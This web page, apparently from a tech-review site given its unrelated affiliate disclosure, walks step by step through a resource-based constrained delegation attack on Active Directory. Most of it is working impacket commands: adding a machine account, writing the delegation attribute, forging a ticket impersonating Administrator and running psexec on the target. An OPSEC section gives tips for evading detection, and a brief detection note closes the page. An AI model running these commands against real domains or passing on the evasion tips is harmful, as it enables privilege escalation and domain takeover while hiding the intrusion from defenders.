Resource-Based Constrained Delegation Attack Chain: Full Walkthrough
Affiliate disclosure: When you buy through links on BestPocketTech we may earn a commission at no extra cost to you. As an Amazon Associate we earn from qualifying purchases. Our recommendations are based on independent research and editorial standards.
Prerequisites
- A computer account (or any principal with SPN) that we control
WriteProperty/GenericWriteACL on a target computer object
Attack Flow
1. Add Machine Account
impacket-addcomputer 'DOMAIN/user:pass' -computer-name 'ATTACKER$' -computer-pass 'P@ssw0rd123' -dc-ip 10.0.0.12. Write msDS-AllowedToActOnBehalfOfOtherIdentity
impacket-rbcd -delegate-from 'ATTACKER$' -delegate-to 'TARGET$' -dc-ip 10.0.0.1 'DOMAIN/user:pass' -action write3. Get S4U2Self → S4U2Proxy Ticket
impacket-getST -spn 'cifs/TARGET.domain.local' -impersonate Administrator 'DOMAIN/ATTACKER$:P@ssw0rd123' -dc-ip 10.0.0.1
export KRB5CCNAME=Administrator.ccache
impacket-psexec -k -no-pass TARGET.domain.localOPSEC
- Use an existing low-privilege computer account instead of creating a new one
- Clean
msDS-AllowedToActOnBehalfOfOtherIdentityattribute after use - Avoid
psexec— use WMI or scheduled tasks for less noisy lateral movement
Detection
BloodHound edges: WriteProperty on computer objects. Alert on changes to msDS-AllowedToActOnBehalfOfOtherIdentity via LDAP change log (Event 4662 + object type check).